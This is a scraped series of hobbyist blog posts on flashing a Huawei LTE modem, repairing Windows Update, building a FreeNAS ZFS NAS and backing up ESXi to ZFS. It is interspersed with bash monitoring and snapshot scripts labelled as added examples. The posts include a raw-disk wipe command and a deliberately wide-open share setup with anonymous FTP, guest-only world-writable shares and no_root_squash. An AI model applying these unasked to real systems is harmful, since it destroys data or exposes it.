<li>Run "E3372h-153_Update_22.180.05.00.00.exe" from "[5] Huawei E3372h-153 HiLink FW" folder.</li>
<ul>
<li>This upgrades (or downgrades) your HiLink firmware version. You may need Flash code from one of those calculators to do this.</li>
<li>Wait until HiLink update is complete and you can ping 192.168.8.1 again.</li>
</ul>
<li>Run "sw_project_mode.cmd" from "[3] Switchmode E3372h" folder</li>
<li>Run "E3372h-153Update_21.200.07.00.805_Universal.exe" from "[6] Huawei_E3372h-153 Stick FW" folder.</li>
<ul>
<li>This finally changes firmware from HiLink to Stick. You may need Flash code again.</li>
<li>Wait until Stick update is complete. You can no longer ping 192.168.8.1 and RNDIS adapter has changed to "HUAWEI Mobile Connect - Network Card".</li>
</ul>
<li>Run "putty.exe" from "[7] Putty" folder</li>
<ul>
<li>Find serial port name from Device Manager, for example in case of "HUAWEI Mobile Connect - PC UI Interface (COM15)" port name is COM15</li>
<li>Click Serial on right hand side of Putty screen and type COM15 or whatever your port is.</li>
<li>Click Open at the bottom of Putty</li>
<li>Type ' ATE1 ' without quotes; you won't see what you type, and DO NOT try to use backspace. If you did it right you get ' OK ' as the reply. Ignore ^RSSI etc. lines you might also see.</li>
<li>Type following commands one per line to see info about your device and verify connection works. </li>
<ul>
<li>' ATI '</li>
<li>' AT^FHVER '</li>
<li>' AT^VERSION? '</li>
</ul>
<li>Get current SETPORT value by typing ' AT^SETPORT? '. You might want to write these down if you ever want to revert back to defaults. Mine was ' ^SETPORT:A1,A2;12,1,16,A1,A2 '.</li>
<li>Set the new SETPORT value by typing ' AT^SETPORT="FF;12,16" '. This is claimed to disable CD emulation and the modeswitch requirement, but actually it only disables unnecessary ports appearing after modeswitch. So you still need the automated switch from CD emulation to WWAN with "Mobile Broadband HL Service" or "usb-modeswitch" in Linux.</li>
<li>If you want to keep PPP support for example for older router with USB port use ' AT^SETPORT="FF;12,10,16" ' instead. Remember that you won't get full speed with PPP.</li>
<li>Reset modem by typing ' AT^RESET '.</li>
<li>Close Putty now.</li>
</ul>
<li>Done. </li>
</ul>
<div>
<br /></div>
<div>
Your E3372h is now in stick mode and presents itself as an NCM device that's compatible with the Windows Mobile Broadband feature and also with huawei_cdc_ncm under Linux. You don't need third-party mobile tools on Windows. This means: to connect to the Internet, use the built-in features of your operating system and stay away from "Mobile Partner" etc.</div>
</div>
<div>
<br /></div>
<div>
If you prefer keeping HiLink, why not root it? :) If you don't root it, someone else probably will, given Huawei's track record on security... There's an <a href="http://sh.com.hr/en/modificiranje-huawei-e3372-lte-sticka/">excellent writeup</a> and step-by-step instructions in English from Ivan. The modeswitch tools are also from him.</div>
<div>
<br /></div>
<div>
The rest of the files were collected from links found on <a href="http://www.lteforum.at/">lteforum.at</a>, <a href="http://4pda.ru/forum/">4pda.ru</a> and <a href="https://3ginfo.ru/download75.html">3Ginfo.ru</a>.</div>
<div>
<br /></div>
<div>
P.S. You can get E3372h-153's from <a href="http://www.ebay.ie/sch/i.html?_from=R40&_sacat=0&_sop=15&_nkw=Huawei%20E3372H-153&LH_PrefLoc=3&rt=nc&LH_BIN=1&_trksid=p2045573.m1684">Ebay for 29€ each</a> including shipping from Latvia. The downside of these cheap ones is broken locking tabs on the top cover. This is because they're LMT-branded and were superglued shut with an LMT SIM card inside.</div>
<br />
Upgrading Huawei E367u-2 firmware (2016-08-23)<br />
<br />
Trying to upgrade a Huawei E367u-2 from the old 11.810.09.00.00 to the latest available <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/e367u-2/E367Update_11.838.01.00.1131.B726.exe">11.838.01.00.1131</a> ends up with error code 16. This one was easy to fix: flash <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/e367u-2/E367Update_11.810.09.33.00.B726.exe">11.810.09.33.00</a> first and then the latest.<br />
<br />
Upgrading Sierra Wireless 319U firmware (2016-08-23)<br />
<br />
The Sierra Wireless 319U is a fairly decent USB 3G dongle that supports up to 42Mbit/s DC-HSPA+. However, it has a nasty tendency to <a href="https://kb.juniper.net/InfoCenter/index?page=content&id=KB26433">randomly hang</a>.<br />
<br />
Ever since Sierra sold their USB dongle business to Netgear, finding firmware updates has become difficult. It's always been difficult, to be fair.<br />
<br />
The Netgear website does not offer firmware upgrades for the 319U, but they do have an upgrade (N_2_0_8_1CAP) for the Telus-branded variant of the 319U. This worked OK with my Sierra 319U, which had the older and buggy N_2_0_5AP firmware.<br />
<br />
The latest available appears to be <a href="http://www.downloads.netgear.com/files/aircard/TelstraAC312U-N2_0_8_6bt-N2_0_8_6ap.exe">N_2_0_8_6AP</a>, which is also what Juniper recommends in their KB article linked above. Since the Sierra 312U and 319U are the same device (apart from a different form factor), I simply downloaded the upgrade for the Telstra-branded 312U and flashed it to the generic Sierra 319U.<br />
<br />
Win10 Windows Update stuck at 0% downloading updates (2016-08-08)<div class="tr_bq">
All the hype with Windows 10, and still something as elementary as Windows Update keeps getting corrupted. The common failure appears to be that it properly detects the required updates but then gets stuck at 0% when downloading them.</div>
Microsoft has a <a href="http://go.microsoft.com/?linkid=9830262">troubleshooting tool</a>, but that was only able to tell me WU is broken rather than fix it as claimed. Not even re-installing Windows over the existing install would help. A clean install would of course have solved it, but I was not interested in setting up everything again to my liking.<br />
<br />
So let's do it manually. Stop all affected services.<br />
<br />
<b>net /y stop wuauserv</b><br />
<b>net /y stop cryptsvc</b><br />
<b>net /y stop bits</b><br />
<b>net /y stop msiserver</b><br />
<br />
Now you'll probably end up with an unstoppable wuauserv service. Even when you do manage to kill it, it'll autostart, preventing removal of the corrupted SoftwareDistribution folder. Here's how to work around this.<br />
<br />
<b>net /y stop wuauserv & taskkill /F /FI "SERVICES eq wuauserv" & ren c:\windows\softwaredistribution softwaredistribution.bad & ren c:\windows\system32\catroot2 catroot2.bad</b><br />
<br />
And restart them.<br />
<br />
<b>net start wuauserv</b><br />
<b>net start cryptsvc</b><br />
<b>net start bits</b><br />
<b>net start msiserver</b><br />
<br />
<br />
<br />
Silently and unattended install / upgrade Windows drivers (2016-02-23)<br />
<br />
Upgrading Windows drivers tends to be a troublesome and time-consuming process. Here's a little trick to make it easier.<br />
<br />
Start by downloading a suitable "SCCM" driver package from the manufacturer's site.<br />
<br />
HP: <a href="http://ftp.hp.com/pub/caps-softpaq/cmit/HP_Driverpack_Matrix_x64.html">http://ftp.hp.com/pub/caps-softpaq/cmit/HP_Driverpack_Matrix_x64.html</a><br />
Dell: <a href="http://en.community.dell.com/techcenter/enterprise-client/w/wiki/2065.dell-command-deploy-driver-packs-for-enterprise-client-os-deployment">http://en.community.dell.com/techcenter/enterprise-client/w/wiki/2065.dell-command-deploy-driver-packs-for-enterprise-client-os-deployment</a><br />
Lenovo: <a href="https://support.lenovo.com/fi/fi/documents/ht074984">https://support.lenovo.com/fi/fi/documents/ht074984</a><br />
<br />
Unpack the driver pack and <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/Driver_Upgrade.zip">this zip file</a> into the same folder. The linked zip contains dpinst with a minimal config file and a VBS script to launch it with elevated rights and the correct command-line parameters. So run "Driver_Upgrade.vbs" and wait a few minutes. Reboot. Done.<br />
<br />
Low budget fanless ZFS NAS (2015-12-17)<br />
<br />
Dunno how this will end up, as I again made the mistake of digging up one of those Wyse Z90D7 terminals from the junk pile. This time my idea is to use it for a NAS after upgrading the RAM from 2GB to 6GB and adding two 1TB 2.5" USB3 disks. Wyse being fanless and with host-powered disks, this should be a decent combo.<br />
<br />
Then add FreeNAS 9.2 and ZFS with snapshots. Snapshots are a mandatory feature, as I'm sending this to a friend of mine as a Christmas present. He's one of those who insist on installing every virus and cryptolocker they can find. With data backed up to the NAS and protected by daily snapshots, recovery is much easier than ever before. That assumes he saves his important data to the network drive, which will then probably corrupt it all due to me using inappropriate hardware...<br />
<br />
<a name='more'></a>Design "parameters"<br />
<div>
<div>
- Two USB3 disks in a ZFS mirror.</div>
<div>
- Three datasets: datat, scratch and spycam.</div>
<div>
- Snapshots once per day for datat and scratch.</div>
<div>
- Keep snapshots for a shorter time on the scratch dataset.</div>
<div>
- No performance needs, since clients connect over a 54Mbit/s multihop WLAN mesh.</div>
<div>
- All users granted global read/write to all data.</div>
<div>
- No need to access from Internet.</div>
<div>
- No plugins or jail services on FreeNAS.</div>
<div>
- Ability to upload images using FTP (from WiFi IP cameras).</div>
<div>
- No maintenance. Set it and forget it - at least until both disks fail.</div>
<div>
<br />
<div>
Let's start by adding some RAM to the Wyse. First I took a 2GB module from another identical Wyse, so no compatibility issues, but 4GB is a bit too far below the FreeNAS 8GB requirement, so I kept one of the Wyse DIMMs and added one Kingston "KTD-XPS730B/4G 1.5V" for a total of 6GB. I'm using PC3-10600U RAM and the BIOS shows a 1333MHz bus speed.<br />
<br />
With 6GB RAM and a 4GB internal SSD we're still well below the FreeNAS minimum hardware requirements, which are 8GB RAM and 8GB storage. I think that with just two 1TB disks and only the Samba and FTP services running, 6GB will be more than enough.<br />
<br />
<a href="http://download.freenas.org/9.2.1.9/RELEASE/x64/">Download</a> the latest FreeNAS 9.2 build; I used FreeNAS-9.2.1.9-RELEASE-x64.<u><b>usb</b></u> myself. A real shame we're stuck with 9.2 instead of the latest 9.3. That's because 9.2 is the last version that can boot on any standard PC. Starting with 9.3 the developers decided to switch to GPT (to be able to boot from ZFS), so many PCs can no longer run FreeNAS. Unsurprisingly the Z90D7 is among those no longer compatible, which, combined with the fact that 9.2 has less than perfect USB3 support, is a bit worrying. If you're using Windows, use <a href="https://rufus.akeo.ie/downloads/">Rufus</a> to create the bootable USB install media.<br />
<br />
If you haven't done so already, upgrade to a recent BIOS following my earlier <a href="http://blog.asiantuntijakaveri.fi/2015/07/updating-wyse-z90d7-windows-terminal.html">instructions</a>. Connect the FreeNAS install USB stick to the Wyse but DO NOT connect the USB3 disks yet. Go to BIOS setup and enable USB boot so we can boot from the FreeNAS install media. Set the boot order so that everything is disabled (press "!") except SATA0 and the FreeNAS install media. SATA0 should be first in the boot order list. Save changes and hit "P" on startup to access the boot menu and boot from USB.<br />
<br />
On the FreeNAS menu select shell and wipe your internal SSD to avoid "error 19" issues caused by left-over junk. Check the device name of the SSD using "camcontrol devlist"; in my case it was "ada0". Then overwrite it using "dd if=/dev/zero of=/dev/ada0 bs=4096". This will take around 15 minutes at the 4MB/s rate the internal SSD is capable of. After dd completes, type "reboot" and boot the PC again from the FreeNAS USB install stick.<br />
<br />
Follow the install instructions; there's actually only one prompt, where to install, which is obviously our internal SSD. After the install go to BIOS settings and disable USB boot so the only thing the PC can boot from is our internal SSD.<br />
<br />
On first boot after the install FreeNAS will fetch an IP from DHCP, which is shown on the console after bootup is complete. You can also set a fixed IP now if you don't have or don't like DHCP.<br />
<br />
Next open a web browser and connect to the IP of the FreeNAS.<br />
- Set the admin password when prompted<br />
- The login will be "root"<br />
<br />
- System > System Information > Edit hostname<br />
-- Enter name and domain for device<br />
<br />
- System > Settings > General<br />
-- Set keymap and timezone<br />
<br />
- System > Settings > Advanced<br />
-- Check "Enable powerd"<br />
-- Set "Swap size on each drive" to 4<br />
-- Check "Show console messages"<br />
-- Check "Show advanced fields"<br />
-- Check "Enable autotune"<br />
-- Uncheck "Enable automatic upload of crash dumps"<br />
<br />
- System > Tunables > Add Tunable<br />
-- Variable: xhci_load<br />
-- Value: YES<br />
-- Comment: Enable USB3 support<br />
<br />
- System > Tunables > Add Tunable<br />
-- Variable: vfs.zfs.prefetch_disable<br />
-- Value: 0<br />
-- Comment: Enable ZFS prefetch with <4GB RAM<br />
<div>
<br /></div>
<div>
Click Shutdown at the bottom left, connect the USB3 disks and restart the PC. Then log in again to the web interface.</div>
<div>
<br /></div>
<div>
- System > SMART Tests > Add SMART Test</div>
<div>
-- Disks: da0 and da1</div>
<div>
-- Type: Long Self-Test</div>
<div>
-- Description: Do long self-test every month</div>
<div>
-- Hour > Each selected hour: 03</div>
<div>
-- Day > Each selected day: 15</div>
<div>
<br /></div>
<div>
- Storage > Volumes > View Disks</div>
<div>
-- Select both disks and click Edit in Bulk</div>
<div>
-- HDD Standby: 10</div>
<div>
-- Power Management: Level 64</div>
<div>
-- Acoustic Level: Maximum</div>
<div>
<br /></div>
<div>
- Storage > Volumes > ZFS Volume Manager</div>
<div>
-- Volume Name: pool</div>
<div>
-- add both disks</div>
<div>
-- Layout: Mirror</div>
<div>
<br /></div>
<div>
- Storage > Volumes > /mnt/pool > Create ZFS Dataset</div>
<div>
-- Dataset Name: datat</div>
<div>
-- Enable atime: Off</div>
<div>
<br /></div>
<div>
<div>
<div>
<div>
- Storage > Volumes > /mnt/pool > Create ZFS Dataset</div>
<div>
-- Dataset Name: scratch</div>
<div>
-- Enable atime: Off</div>
<div>
<br /></div>
</div>
</div>
</div>
<div>
<div>
- Storage > Volumes > /mnt/pool > Create ZFS Dataset</div>
<div>
-- Dataset Name: spycam</div>
<div>
-- Compression level: Off</div>
<div>
-- Enable atime: Off</div>
<div>
-- Quota for dataset: 200G</div>
<div>
<br /></div>
</div>
<div>
<div>
- Storage > Volumes > /mnt/pool/datat > Change Permissions</div>
<div>
-- Mode: Owner, Group and Other R/W/X</div>
</div>
<div>
<div>
<div>
<br /></div>
<div>
- Storage > Volumes > /mnt/pool/scratch > Change Permissions</div>
<div>
-- Mode: Owner, Group and Other R/W/X</div>
</div>
</div>
<div>
<div>
<div>
<br /></div>
<div>
- Storage > Volumes > /mnt/pool/spycam > Change Permissions</div>
<div>
-- Mode: Owner, Group and Other R/W/X</div>
</div>
</div>
<div>
<br /></div>
<div>
- Storage > Periodic Snapshot Tasks > Add Periodic Snapshot</div>
<div>
-- Volume/Dataset: pool/datat</div>
<div>
-- Lifetime: 52 Weeks</div>
<div>
-- Begin: 01:00:00</div>
<div>
-- End: 05:00:00</div>
<div>
-- Interval: 1 day</div>
<div>
-- Weekday: Select all days</div>
<div>
<br /></div>
<div>
<div>
- Storage > Periodic Snapshot Tasks > Add Periodic Snapshot</div>
<div>
-- Volume/Dataset: pool/scratch</div>
<div>
-- Lifetime: 1 Week</div>
<div>
-- Begin: 01:00:00</div>
<div>
-- End: 05:00:00</div>
<div>
-- Interval: 1 day</div>
<div>
-- Weekday: Select all days</div>
</div>
<div>
<br /></div>
<div>
<div>
- Services > SMART</div>
<div>
-- Power mode: "Standby"</div>
<div>
<br /></div>
<div>
- Services > FTP</div>
</div>
<div>
-- Clients: 10</div>
<div>
-- Connections: 10</div>
<div>
-- Login attempts: 10</div>
<div>
-- Check "Allow anonymous"<br />
<div>
-- Path: /mnt/pool/spycam</div>
<div>
-- File permissions: Owner, Group and Other R/W</div>
<div>
-- Directory permissions: Owner, Group and Other R/W/X</div>
</div>
<div>
- Services > Control Services</div>
<div>
-- Toggle CIFS to ON</div>
<div>
-- Toggle FTP to ON</div>
<div>
<br /></div>
<div>
<div>
- Sharing > Windows CIFS > Add share</div>
<div>
-- Name: DATAT</div>
<div>
-- Path: /mnt/pool/datat</div>
<div>
-- Check "Allow Guest"</div>
<div>
-- Check "Only Allow Guest"</div>
<div>
<br /></div>
<div>
<div>
- Sharing > Windows CIFS > Add share</div>
<div>
-- Name: SCRATCH</div>
<div>
-- Path: /mnt/pool/scratch</div>
<div>
-- Check "Allow Guest"</div>
<div>
-- Check "Only Allow Guest"</div>
<div>
<br /></div>
</div>
</div>
<div>
<div>
<div>
- Sharing > Windows CIFS > Add share</div>
<div>
-- Name: SPYCAM</div>
<div>
-- Path: /mnt/pool/spycam</div>
<div>
-- Check "Allow Guest"</div>
<div>
-- Check "Only Allow Guest"</div>
<div>
<br /></div>
</div>
</div>
<div>
- System > Settings</div>
<div>
-- Save Config and keep the backup in a safe place</div>
<div>
<br /></div>
</div>
</div>
</div>
<div>
Performance? Enough to fill the 100Mbit/s uplink to the Aruba A200 WLAN controller, which is far more than the two-to-four-hop 802.11g 54Mbit/s WLAN mesh the clients are connected to can handle. Performance does plummet hard with multiple clients and random I/O, but that doesn't matter much in this case.</div>
<div>
<br /></div>
<div>
Reliability? Dunno. Pulling the USB cable while there's I/O didn't hurt, and the disk is promptly dropped from ZFS. Plugging the cable back in won't bring it back, so a reboot is required. Resilver speed was around 22MB/s and scrubbing healthy disks runs at ~45MB/s. I had to trigger that manually after the reboot. I also tried pulling the power cable and FreeNAS recovered fine from it.</div>
<div>
<br /></div>
<div>
<div>
Done? Close enough. Should set up SMTP alerts to catch failing disks, though.</div>
</div>
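<div>
The SMTP alert for failing disks needs something to decide when to alert. This added example (not the post's code) parses the text of "zpool status -v" the way a cron job on the NAS could, flagging vdevs that are not ONLINE, non-zero error counters, permanent data errors and a resilver or scrub still running; the two samples are constructed for the post's mirror named "pool" (da0/da1 are assumed device names).</div>

```bash
#!/bin/bash
# Added example, not from the original post: parse "zpool status -v" output and
# report anything worth an alert on this NAS: vdevs that are not ONLINE, non-zero
# READ/WRITE/CKSUM counters, permanent data errors, or a resilver/scrub still running.

# Prints one finding per line; returns 0 when the pool is healthy, 1 otherwise.
# $1: text of "zpool status -v" (reads stdin when omitted).
check_pool_status() {
    local status="${1:-$(cat)}" findings="" in_config=0 line name state rd wr ck
    while IFS= read -r line; do
        case "$line" in
            config:*) in_config=1; continue ;;
            errors:*) in_config=0
                      [[ "$line" == *"No known data errors"* ]] ||
                          findings+="data errors: ${line#errors: }"$'\n'
                      continue ;;
            *resilver*"in progress"*|*"scrub in progress"*)
                      findings+="pool busy: ${line##*scan: }"$'\n' ;;
        esac
        (( in_config )) || continue
        # config table columns: NAME STATE READ WRITE CKSUM [note]
        read -r name state rd wr ck _ <<<"$line"
        [[ -z "$name" || "$name" == "NAME" ]] && continue
        [[ "$state" == "ONLINE" ]] || findings+="$name is $state"$'\n'
        if [[ "$rd$wr$ck" =~ ^[0-9]+$ ]] && (( rd + wr + ck > 0 )); then
            findings+="$name has errors read=$rd write=$wr cksum=$ck"$'\n'
        fi
    done <<<"$status"
    printf '%s' "$findings"
    [[ -z "$findings" ]]
}

# Constructed samples of "zpool status -v" for the post's two-disk mirror named
# "pool": healthy, and after the second USB disk was unplugged (shown as REMOVED).
SAMPLE_OK='  pool: pool
 state: ONLINE
config:
        NAME        STATE     READ WRITE CKSUM
        pool        ONLINE       0     0     0
          mirror-0  ONLINE       0     0     0
            da0     ONLINE       0     0     0
            da1     ONLINE       0     0     0
errors: No known data errors'
SAMPLE_DEGRADED='  pool: pool
 state: DEGRADED
config:
        NAME        STATE     READ WRITE CKSUM
        pool        DEGRADED     0     0     0
          mirror-0  DEGRADED     0     0     0
            da0     ONLINE       0     0     0
            da1     REMOVED      0     0     0
errors: No known data errors'

check_pool_status "$SAMPLE_DEGRADED" || echo "-> alert needed"
```

In a daily cron entry something like <span style="font-family: Courier New, Courier, monospace;">zpool status -v | check_pool_status || mail -s "ZFS problem" root</span> turns the findings into the alert the post is missing (assuming a working local mail setup).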
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-50788116747162521362015-12-11T11:31:00.001+02:002015-12-11T11:31:15.842+02:00Backup VMware ESXi to Linux with ZFS<br />
The lowest-budget backups for your free VMware ESXi hypervisor.<br />
<br />
<a name='more'></a><div>
- Install a server with a bunch of disks and Ubuntu 14.04. Use mdraid-1 for the OS disks.</div>
<div>
<br />
- Install ZFS support<br />
<span style="font-family: Courier New, Courier, monospace;">apt-add-repository -y ppa:zfs-native/stable</span><br />
<span style="font-family: Courier New, Courier, monospace;">apt-get update</span><br />
<span style="font-family: Courier New, Courier, monospace;">apt-get -y install ubuntu-zfs</span><br />
<br />
- Create RAID-Z2 (double parity) zpool<br />
<span style="font-family: Courier New, Courier, monospace;">zpool create -o ashift=12 -o failmode=continue data raidz2 \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-ST31000340NS_9QJ6ZHJJ \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-ST31000340NS_9QJ718FG \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-WDC_WD1002FBYS-02A6B0_WD-WMATV7379900 \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-WDC_WD10EACS-00ZJB0_WD-WCASJ0857564 \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-WDC_WD10EACS-00ZJB0_WD-WCASJ0945918</span><br />
<br />
- Create filesystem with compression (and deduplication if you feel brave)<br />
<span style="font-family: Courier New, Courier, monospace;">zfs set atime=off data</span><br />
<span style="font-family: Courier New, Courier, monospace;">zfs create data/backup</span><br />
<span style="font-family: Courier New, Courier, monospace;">zfs set compression=on data/backup</span><br />
<span style="font-family: Courier New, Courier, monospace;">#zfs set dedup=on data/backup</span><br />
<br />
- Install NFS server<br />
<span style="font-family: Courier New, Courier, monospace;">apt-get -y install nfs-kernel-server</span><br />
<br />
- Export new ZFS filesystem to VMware ESXi<br />
<span style="font-family: Courier New, Courier, monospace;">mkdir /data/backup/esx</span><br />
<span style="font-family: Courier New, Courier, monospace;">echo "/data/backup 10.0.0.11(rw,async,no_subtree_check,no_root_squash)" >>/etc/exports</span><br />
<span style="font-family: Courier New, Courier, monospace;">exportfs -rv</span><br />
<span style="font-family: Courier New, Courier, monospace;">service nfs-kernel-server restart</span><br />
<br />
- Mount the new NFS export in VMware (Config > Storage > Add Storage > NFS > enter the Linux server IP, /data/backup as the path and BACKUP as the name).<br />
<br />
- Create an SSH key on Linux; just press Enter at every question<br />
<span style="font-family: Courier New, Courier, monospace;">ssh-keygen</span><br />
<br />
- Copy /root/.ssh/id_rsa.pub to /data/backup<br />
<span style="font-family: Courier New, Courier, monospace;">cp /root/.ssh/id_rsa.pub /data/backup</span><br />
<br />
- Enable SSH remote access on ESXi; see the VMware docs for details if you haven't already done this<br />
- Log in to ESXi using SSH<br />
<span style="font-family: Courier New, Courier, monospace;">ssh root@10.0.0.11</span><br />
<br />
- Enable passwordless SSH logins (the following commands are entered in the ESXi shell)<br />
<span style="font-family: Courier New, Courier, monospace;">mv /vmfs/volumes/BACKUP/id_rsa.pub /etc/ssh/keys-root/authorized_keys</span><br />
<span style="font-family: Courier New, Courier, monospace;">chmod 0400 /etc/ssh/keys-root/authorized_keys</span><br />
<br />
- Log out of the ESXi shell and reconnect using SSH. You should now be able to log in without a password.<br />
<br />
- Install ghettoVCB (enter the rest of the commands on the Linux side, not in the ESXi shell)<br />
<span style="font-family: Courier New, Courier, monospace;">cd /data/backup</span><br />
<span style="font-family: Courier New, Courier, monospace;">wget https://github.com/lamw/ghettoVCB/archive/master.tar.gz</span><br />
<span style="font-family: Courier New, Courier, monospace;">tar xvzf master.tar.gz</span><br />
<span style="font-family: Courier New, Courier, monospace;">mv ghettoVCB-master scripts</span><br />
<span style="font-family: Courier New, Courier, monospace;">rm -f master.tar.gz</span><br />
<br />
- Create the config file (it lives in the scripts directory the cron job points at) and keep weekly backups for an entire year<br />
<span style="font-family: Courier New, Courier, monospace;">cd /data/backup/scripts</span><br />
<span style="font-family: Courier New, Courier, monospace;">mv ghettoVCB.conf ghettoVCB.conf.dist</span><br />
<span style="font-family: Courier New, Courier, monospace;">cat <<'_EOF_'>ghettoVCB.conf</span><br />
<span style="font-family: Courier New, Courier, monospace;">VM_BACKUP_VOLUME=/vmfs/volumes/BACKUP/esx/</span><br />
<span style="font-family: Courier New, Courier, monospace;">DISK_BACKUP_FORMAT=thin</span><br />
<span style="font-family: Courier New, Courier, monospace;">VM_BACKUP_ROTATION_COUNT=52</span><br />
<span style="font-family: Courier New, Courier, monospace;">_EOF_</span><br />
<br />
- Schedule backups<br />
<span style="font-family: Courier New, Courier, monospace;">cat <<'_EOF_'>>/etc/crontab</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Backup ESXi every Saturday night</span><br />
<span style="font-family: Courier New, Courier, monospace;">5 1 * * Sat root (ssh root@10.0.0.11 -C '/vmfs/volumes/BACKUP/scripts/ghettoVCB.sh -a -g /vmfs/volumes/BACKUP/scripts/ghettoVCB.conf') >>/data/backup/esx/logi 2>&1</span><br />
<span style="font-family: Courier New, Courier, monospace;">_EOF_</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">service cron restart</span></div>
<div>
<br /></div>
- Do the first run manually so we don't need to wait until Saturday<br />
<span style="font-family: Courier New, Courier, monospace;">ssh root@10.0.0.11 -C '/vmfs/volumes/BACKUP/scripts/ghettoVCB.sh -a -g /vmfs/volumes/BACKUP/scripts/ghettoVCB.conf'</span><br />
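The ESXi host writes to data/backup over an rw, no_root_squash NFS export, so whatever runs on the hypervisor can also alter or delete older backups. The same daily-snapshot retention the FreeNAS post configures in its GUI (52 weeks for datat, 1 week for scratch) protects against that here too: a ZFS snapshot taken after each ghettoVCB run is read-only from the NFS side. This added example (not the posts' own code, and not part of ghettoVCB) implements that retention with the zfs CLI; the dataset names, the "auto-" snapshot prefix and the sample listing are assumptions.<br />

```bash
#!/bin/bash
# Added example, not from either post: the retention the FreeNAS post sets up in the
# GUI (daily snapshots kept 52 weeks for datat, 1 week for scratch), done by hand with
# the zfs CLI so the same idea can protect the Linux backup server: snapshotting
# data/backup after each ghettoVCB run gives a read-only copy that nothing writing
# over the rw/no_root_squash NFS export can modify or delete.
# Assumes OpenZFS on Linux ("zfs" in PATH); dataset names and lifetimes are examples.

WEEK=$((7 * 24 * 3600))

# Print the names of snapshots older than the given lifetime.
# $1: listing lines "<snapshot>TAB<creation epoch>", the format printed by
#     zfs list -H -p -t snapshot -o name,creation
# $2: lifetime in seconds   $3: "now" as epoch seconds
expired_snapshots() {
    local listing="$1" lifetime="$2" now="$3" name created
    while IFS=$'\t' read -r name created; do
        [[ -n "$created" ]] || continue
        if (( now - created > lifetime )); then
            printf '%s\n' "$name"
        fi
    done <<<"$listing"
}

# Snapshot dataset $1, then destroy this script's own snapshots ("auto-" prefix)
# older than $2 seconds. Meant to run right after the ghettoVCB cron job succeeds.
snapshot_and_prune() {
    local dataset="$1" lifetime="$2" listing snap
    zfs snapshot "$dataset@auto-$(date -u +%Y%m%d-%H%M%S)" || return 1
    listing=$(zfs list -H -p -t snapshot -d 1 -o name,creation "$dataset" | grep '@auto-' || true)
    while IFS= read -r snap; do
        [[ -n "$snap" ]] && zfs destroy "$snap"
    done < <(expired_snapshots "$listing" "$lifetime" "$(date +%s)")
}

# Constructed listing: three snapshots of data/backup relative to a fixed "now"
# (1450000000 = 2015-12-13 09:46:40 UTC), 53 weeks, 10 weeks and 6 days old.
SAMPLE_NOW=1450000000
SAMPLE_LISTING=$(printf 'data/backup@auto-old\t%d\ndata/backup@auto-mid\t%d\ndata/backup@auto-new\t%d\n' \
    $((SAMPLE_NOW - 53 * WEEK)) $((SAMPLE_NOW - 10 * WEEK)) $((SAMPLE_NOW - 6 * 24 * 3600)))

echo "expired under the 52-week policy (datat / weekly ESXi backups):"
expired_snapshots "$SAMPLE_LISTING" $((52 * WEEK)) "$SAMPLE_NOW"   # auto-old
echo "expired under the 1-week policy (scratch):"
expired_snapshots "$SAMPLE_LISTING" "$WEEK" "$SAMPLE_NOW"          # auto-old, auto-mid
```

Wrap the crontab's ssh command in a script that calls <span style="font-family: Courier New, Courier, monospace;">snapshot_and_prune data/backup $((52 * WEEK))</span> only when ghettoVCB exits successfully, so a failed run never pushes a good snapshot out of the rotation.<br />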
<div>
<br /></div>
</div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0